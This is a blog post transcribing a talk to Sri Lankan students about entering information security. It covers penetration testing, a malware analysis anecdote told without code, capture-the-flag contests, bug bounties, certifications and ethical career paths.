In June I had the wonderful privilege to speak with ex-Lulzsec Jake Davis (https://twitter.com/DoubleJake) to some awesome students in Colombo, Sri Lanka. Hard to believe it was the nations first ever Cyber Security conference for youth! The aim was to both raise awareness about Cyber Security and reflect the different ways the students might understand it, and merge into the industry. On top of the incredible hospitality (CICRA, Deakin), the food, culture, travel and especially roasted cashews were all a pretty top experience. I'm only upset I couldn't spend longer, but was the start to over 14 flights in under a month and as such was a tight schedule.
BMICH - where the summit was held. I believe the president was talking literally in the other room from us, so security was super tight (military police had a good look at my RubberDucky + LANturtles o.O)
The summit was visited/shared by some exceptional people known very well in Sri Lanka - The honorable minister for Telecommunications Harin Fernando, the founder of the DailyFT, the CEO of CERT Sri Lanka Lal Dias, and CEO of CICRA, now a great friend Boshan Dayaratne. Further to that, the most important attendance was that of the 500+ students, of which some travelled almost 8 hours by bus overnight just to get there.
10/10 view to hack to, cosy and in the middle of Colombo. Also saw a tropical storm rip the roof off a building just below me, woo!
I'm very greatful to Deakin for providing the opportunity, even some years on from graduating. On behalf of Deakin, I spoke about entry pathways to the students to get into the world of InfoSec - namely penetration testing, and my experience based on work at BAE Systems & DroneSec. No amount of words can truly summarise the experience, but some of the images are listed here.
Right - on to the presentation; keep in mind it is angled towards a young audience, and a Sri Lankan one at that. I've transcripted it as best I can, so apologies if it's too long. However, the slides don't usually make too much sense without the writeup. If you would prefer to only see slides however, you can at this link.
Journey to InfoSec - For Sri Lanka Youth
Ramble about the perception of hackers and the role they play in society.
Today I want to cover some of the basic elements to help you realise why there is a need for security – it’s a fine line between being able to do what your passionate about, and seeing why this is such an incredible field of opportunity that is only going to grow. I also want to touch on why people will pay you good money for it, so that you don’t need to follow the malicious path. Then, I’m going to give you some immediate actions you can do right now to set yourself up for a position in IT security – even earning money while you practice. We all know about the ‘shortage’ of IT security positions; hopefully this talk will give you an insight into what to do to close that gap for yourselves.
So what is security? Why does it affect our world and why are so many people, such as these organisers, intent on bringing you to learn about it? What do they have to gain? Let me tell you…A LOT.
In 1950's East Germany, the Stasi introduced a program to engineer a flaw or a deliberate issue into every lock produced in the country, and created strict import guidelines to prevent any secure lock from entering the country. This meant the locks were deliberately vulnerable to their secret keys, or method of opening it. This was the time when the Stasi, secret police, had control over the people and often arrested or kidnapped those that didn’t agree with them. The flaw allowed them to quietly and quickly enter anyone's home at will. It completely subverted the private, personal space of everyone in the country. Often times, people wouldn’t even know they’d been compromised or had people in their house!
That is to say, if you don't understand the technology that keeps you safe, you can't trust that you are actually secure.
So how do you understand the technology? You break it! You make it, pull it apart and practice with it, manipulate it and see how it works. If only they had some lockpickers back in the day, they may well have found the flaw.
How do you understand technology? Practice! --> Ways to practice
• Understand how something’s built (build something)
• Understand how something works, how to manipulate it
So now we know what we have to do – to assess the security of something, we need to be able to understand it.
The need of security is engrained into every technology, every platform – everything these days surrounds it. Information Security is never complete, but a constant vehicle of research, fixing, recommending and sharing related information to better past and future products. By sharing information, less people will get affected, thus increasing business, time and all while fulfilling their passion of breaking and securing things!
So these people are creating products, but to make good products, it takes many people, and different people use different technologies (e.g. coding).
The products hold information valuable to hackers however, so they find issues that can be a part of one technology, or a combination of many, and find vulnerabilities, that can be exploited to get access to that information.
So in terms of what I do, as a penetration tester – I step into the shoes of these hackers, and also go after that valuable information, finding similar bugs and vulnerabilities – but this time, warning the client about it before stealing the information.
If by chance I don’t manage to find it, or they haven’t had a penetration test, incident responders will arrive at a scene after malware or hackers, to quickly analyse it and stop the problem. They are very important as they tell the client, and the client’s friends what not to do next time.
Back in the Dark Ages, it was so easy to say grow up to be a Blacksmith, a Baker, a Butcher. That’s because you could see their work, you used their services. These days the digital age has put a barrier between you and seeing my/our work - in fact, I’ve probably done penetration testing on your bank, your mobile phone apps, plan, the websites you use. The moment you take a peek at seeing exactly what they do, your passion becomes more real.
InfoSec covers a huge range of items, and even within penetration testing there is a huge number of sub-categories. Just like how cricket has specific positions, batter, bowler, midfielder, as does security – this filters out a lot of talent and leaves you to become a well-paid expert in that area very quickly! I promise you if you were to simply focus on mobile & IoT testing, you’d have work for the next few decades and be handsomely paid for it. With so much diversity there is room for anyone to become an expert.
When I first walked into BAE Systems, the first thing I noticed was that people were introduced as ‘this is x, SCADA tester’ ‘malware reverse engineer’ ‘social engineer/lockpicker’ ‘mobile & wireless security’ – they work so well in a team cause they specialise – you’ll want to find your specialisation too; but make sure its an area of interest. We will cover that further on.
Okay, so lets dive down into a penetration test – this is the most common scenario I do; hacking at it’s purest (bread and butter so always billable ;)). Everything is from the perspective of a black hat, so you have to hunt information that might be crucial to them, and don’t have to follow any kind of pattern or direct path.
The easiest way to achieve access (e.g. brute-forcing) is still very relevant if possible. The main result is showing how to fix those issues, both now and in the future – this allows the client to protect their customers.
A defined scope might also useful for bank applications where they have many testers hitting one form or search bar. Usually however, hackers will look for the lowest hanging fruit to go after, so scoping should never be too particular.
So how would you assess say, a wordpress website?
When we look at a website, we often just see the front end. In reality, going back to our suggestion of many people working on something with lots of different technologies, a website is a combination of items. For example, there are the different layers here.
There are many other layers, from the machine its running on, to the web addresses, passwords, used and even plugins or third-party scripts. All these layers have their own set of code and issues. Versions are important, because each next version patches or fixes issues seen in the previous release – found by hackers or developers. Older versions often contain vulnerabilities that are made public and can be exploited – hence why its so crucial to update!
So each one of these components have their own set of vulnerabilities and attack vectors. Hence why in a penetration test, there may be multiple ways to compromise the application. Having more people going over these different components, such as bug bounty hunters, can also dramatically improve your security as each one has been looked at.
So to dramatically widen your idea of security, all these layers and components are within many different types of technology! It moves so fast that there’s always going to be people needed for security. Any of you here watch twitch? It’s recent! Drones were only a figment of imagination, and uber uses technology in a way no one else used to think about! With these new technologies, many of you know about things myself and other experts don’t even know about. Your role in this new technology will be paramount.
I often find adults/experts misunderstand the knowledge and skills of young people. They align APTs to nation states when it’s most likely a young kid with a tool. It makes me sad because of the young Sri Lankan student caught for defacing president website asking for extension on exams. Bright young kid who, under the age of 18-21, got caught following passion because he lacked the guidance or knowledge of doing it ethically while getting paid for it.
Most of the InfoSec community used to work in other sectors, such as computer science, web development, and networking, and moved horizontally into IT Security as it came about. You have the opportunity to start fresh in InfoSec – learning from the ground up, dedicating all your years to becoming an expert. This means you’ll be helping businesses with issues, solving problems and getting paid at a younger age than most.
I’ve got a cool story about change actually – how many of you know about Bitcoin? Long story short it is a digital currency, invented sometime in 2009 by a completely unknown person. It’s completely virtual, and can be gained by mining or trading items. In about 2011-2012, I was a heavy user of bitcoin, buying eBooks and tools online for 30, 40, sometimes 100 bitcoin.
When bitcoin hit $30 each in around 2013, I mentioned it to a very high profile visiting wall street guru from the US at an economics lecture. He mentioned there was no place for decentralized currencies in the world, and that it would be quickly shut down by the banks. About 6 months later the currency was worth over $1000 USD each – making anyone who had BTC a small fortune. This slide was from a talk I gave about 8 months ago to some students when the price was around 91,000Rs.
This month, one BTC is worth 374,000Rs! Who knows, this could go up again shortly – the main point is, you most likely know something about technology that many others don’t; don’t feel like it will take years to learn, you could latch onto something brand new and become an expert from there!
In North America, during the time when Native American tribes ruled the land, there was an apache tribe that lived between some very tall mountains. The tribe was a warrior tribe, and loved to fight. In order for the traders to come to the village however, they had to travel through a dark and narrow canyon.
The tribe depended on the trade to flourish, however both they and the traders knew it was a dangerous valley. Many of the tribes people were selfish, and when a trade came through, ambushed it to take all of the goods. This could make them temporarily rich, but then the other traders heard about the danger and stayed away – this meant their bounties were far and few between (for them and the rest of the tribe.)
The cheiftan came up with an idea – why not each person spend some time protecting the valley, allowing more traders to come in, as they did, each person would earn a small, daily percentage of the trader passing through to the village. On top of that, they’d get to practice their fighting spirit by fighting of bandits; they could legally fight, and earn a wage, and talk about it in public! They were regarded as heroes!
For those that chose to be selfish and not help the whole town, they chose to continue to steal. It got harder as the guards earned more, and more trade came in. Often, the bandits would be sent to jail, losing everything they had. Can even send and receive things with the traders without worry of it being stolen or destroyed – just like you and I.
We’re still in the wild west today – we have the same scenario, and you have the ability to join the good side. You have a passion for hacking, and you get to use it! You can speak about your skills and experiences, and its legal! You get paid to do it, and make friends in the community.
It’s hard to translate a business making money from your work in a pre-work context. Using myself as an example, this is what my company requests me to do, that makes everyone happy.
That’s how you get paid to hack. Not only do you get paid, but you’ve helped secure technology for people like yourself and your friends, and contributed to others by sharing information about the issue – so hopefully it doesn’t come up next time!
So we know what we’re trying to provide, we know what employers expect of us – but getting that position in the first place is the tough one! Who’s seen crazy job requirements like this before? Who thinks they could do all those skills? A common factor on job applications is ‘Problem Solving.’ I’m going to show you an example of this when I had no idea what kind of skill to apply in this situation.
A client reported that they had received this email, with an invoice attached – anti-virus didn’t pick up the malware but they got ransomware on their computer. I came in to look and found a suspicious email, which someone had opened. It looked like pretty complex code, but somehow this made sense enough to contract malware to their machine! I quickly realised this code wasn’t code at all, but the malware authors' way of hiding the real intent of what it does.
Quite quickly, I started to notice things like ‘HTTP’ and “://my”, which looked like URLs! I also saw bits of words which weren’t quite clear…in this case, it looked like the code had been muddled up and the words substituted.
I have a short video of decoding the script – taking whatever the value ‘equals’ and substituting it for its value. This is a common obfuscation technique, but requires some analysis in order to identify it.
I was able to put together the entire script…using nothing but notepad!I found it visited a URL, downloaded a payload and then executed on the system. This bypassed antivirus because of two methods: 1. Obfuscation of the code, and 2. Because it was only a dropper! It didn’t do anything malicious, yet was able to download a file within the network.
I submitted it to a variety of threat intelligence sites, one low-level one for example VirusTotal. On the day, not a single one detected it as being malicious! However, as we submitted it as malware, the next day almost 14 anti-virus engines were detecting it – stopping it from hitting other customers. A couple months later, only thirty vendors saw it as malware – so obviously it did a decent job of hiding itself.
In the end, we were able to give the client something, and the community something. actionable advice, and due to finding the IP address of the malware, were able to block it, and share it with the world. Hundreds of other companies then added it to their blocklists, meaning it couldn’t affect many others. This was rewarding as you see your work helping others, and involves real critical thinking skills to analyse malware.
So you know what security is, you know how it applies to technology, and that you’ll get paid well for doing it. Thinking back to those job requirements…how you prepare for it now?
There are many ways, but one of the most common ways at getting good at something is doing it repeatedly – and how do you do it repeatedly before starting in the industry legally ? Exposure!You can expose yourself to the world of security far before you enter the workplace.
When I first started university, I was PUMPED to go in and just hack stuff – but I knew nothing about the other parts of security, or why it mattered to others at all (like I’ve just told you). I realised very quickly that University provides an amazing platform for you to be ambiguous in your learning – that is, it provides you a platform, structure and community, and you fill in the rest. You can fill in the rest with ANYTHING you like.
The concept of gamification is a competition or platform containing deliberately vulnerable systems or networks. This means it challenges you to do very similar work that you’d be undertaking within a real role in Cyber Security. For many, it can allow them to hack ethically and legally without the need to practice on equipment belonging to others. I loved the concept so much, and was so motivated by it that I decided to get three of my good friends together and practice it. That three soon become thirty, and so on!
The best form of gamification in my mind is ‘Capture-The-Flag’ which pits you against other students, or people across the world, in a challenge to get the most points. One of the best thing about CTFs are some of the most professional and best hackers in the world are competing, and joined in collaborative chats – meaning you can see how they work, chat to them and learn off them.
There are a range of challenges, from web, infrastructure, crypto, network, and much of the learning comes after the event, reading others write-ups.
Similar to gaming, you get a very relevant feeling of rush, feedback, and see yourself improving over time.
Bug Bounties are an excellent way to gain hands-on experience, and sometimes can be better than CTFs as they utilise real-world production systems. The concept is simple – you look for a bug on places like Facebook, Microsoft, Uber, report issues and get paid individually for each issue. You are legally allowed to test their websites, and scope/reports are excellent training for real-life!
Bug Bounties can be done at any stage, without any experience, requirements or certifications, so are a great way to earn good money in US dollars. Similarly, if you get good enough, you can enter private programs, where they source only the best bounty hunters to participate in closed or often unavailable to the public programs – this is where the big money is at. Keep in mind, Mark Litchfield is an edge case but a great one at that.
Hands up if you’ve ever seen one of the most famous cricketers play in a test match by himself. What about a race car driver, winning the grand prix not racing against anyone else? Skilled people are often, not always, often surrounded by their peers. Motivated, challenged; they hear about events, opportunities, because they’re connected to their ‘tribe.’ It’s the same for infosec. You may hhave a lone hacker who’s good at some things – but sometimes you need multiple people to assessa product or company with multiple layers, requiring many different technologies, mindsets and skillsets.
Once you have a tribe, you can start to mirror the working environment that you’ll be going into, like a machine. When I founded the DISC club, it was because I wanted people to help motivate ME to learn, I would have never found that group of people if it weren’t for Deakin. I wouldn’t have been here if it weren’t for Deakin – University’s connect you, they bring people with connections and opportunities. By supplementing your degree with skills, you become a very relevant and useful business case to your employers.
So you might now be thinking – I can practice everything I need pre-work, I know what to work on, and I can even test without any requirements and earn money! I’m ready for the workforce! However, if I were to board the plane at Melbourne airport tand say to the pilots “hey guys look, I’ve done all the simulators, don’t worry I can fly” – or walked into a hospital and said “I’ve practiced! I can operate on this sick man” do you think I would get very far?
The first thing is that IT Security deals with people’s lives as much as pilots or doctors. We secure critical infrastructure, we prevent hackers from turning off a hospital network, disrupting aircraft systems, and hacking into vehicles. Just like a medical degree or a pilots license, it can be useful to get certified to show employers you’ve worked hard for x amount of years on this – you’re serious, and you’re willing to listen to people with a lot of knowledge and background in the area. It's certainly not always the case, and plenty of great hackers don't have degrees - however in the world of business, it can be super helpful to get your foot in the door.
Now that you’ve exposed yourself to different technologies, examples of a day in the life of a pentester, and have some examples behind you, how can you prove this to an employer? Can they see the hacks you’ve done?
YES. What does a web developer do when they go for a job? They bring a portfolio of their work, examples of sites. What can a penetration tester do? We can also bring a portfolio.
The CTF competitions you’ve participated in, the challenges you tackled and even format them as:
Issue: SQL injection
Description: Due to improper sanitation – found at test.com/hello.php?id=10
Business Case: Could access the client database and customer payment details
Recommendation: Use prepared statements
What the issue was, why it was important, how it could have been exploited and how you could fix it. Can also include any online challenges you’ve done tools you’ve made in github, or bug bounties.
This way, you know what you’re talking about (because you’ve practiced), you know where you’re going (specialisation), and you know how to contribute to a business – this will set you apart from just having the skills! Or certifications
Now, as many of you know I flew in from Melbourne, to Singapore then to Sri Lanka. On the journey over there was a fair amount of turbulence, and couldn’t sleep so started chatting to a lady named Tashy – we chatted for a bit and I explained I was coming over to a group of very talented people, in the hopes of giving them a bit of information I wish I’d had before finishing school. When she found out it was about ethical hacking, her immediate reaction was “Oh…I’m so sorry to tell you this, but most will use it for bad uses.”
And you know what, I don’t blame her for thinking that! It’s so easy to realise you harness a certain amount of power once you have the skills – however, I told her I’d been in a very similar position, and only when guided by mentors (many at Deakin such as Lei Pan), the right path becomes a lot more clear. You can’t blame people, the whole internet points towards being bad instead of showing the good side. In chatting to her, I promised her I’d tell you a story about someone in the hacker community at around the same time as DoubleJake and I.
Back in high school, I used to often chat to a lot of the hackers in different groups – it was how I learned at that point, and was too young for university, and too bored at school not teaching me what I wanted.
Most people knew a couple fellows from a hacking group called ‘TeamPois0n’, including a guy known as ‘TricK.’ The group was a blackhat group, similar to lulzsec and eventually had some of its members arrested for hacking in the MI5 (British SS) phone lines. Most of the community back then would chat to these guys, and knew them fairly well on forums, chats etc.
Just before the end of high school, I took another path and had no contact with any of the old groups. I focused on CTFs, and learning with peers at uni rather than online. A few years passed and I had gone from working at a number of places, eventually for BAE Systems. One day I was riding the tram from work when a news article popped up at me…
“TeamPoison member killed by US drone strike”
Hacking or ‘hacktivism’ took him too far, and although this is an extreme edge case, he ended up fighting for ISIS as their ‘cyber caliphate.’ While this is an rare exception, I know there are many young Australians today with no real compass as to where they want to go in Cyber Security - they love hacking, but fail to channel it into something legal, of worth, protecting Australian companies and making real money for it.
Through the Deakin Information Security Club and SecTalks, my aim is to always let you guys know (both in and new to the industry) there is a world of businesses out there just waiting to pay you for hacking - legally, safely, and without ending up with jail time.
If you’re feeling the pressure of school, know what you want to do – and fastrack yourself to working in an industry you love, that will make you proud and help secure your country, you can follow similar steps to these.
Keep in mind this is oriented towards the Sri Lankan Community. For an Australian-centric version, something similar to below: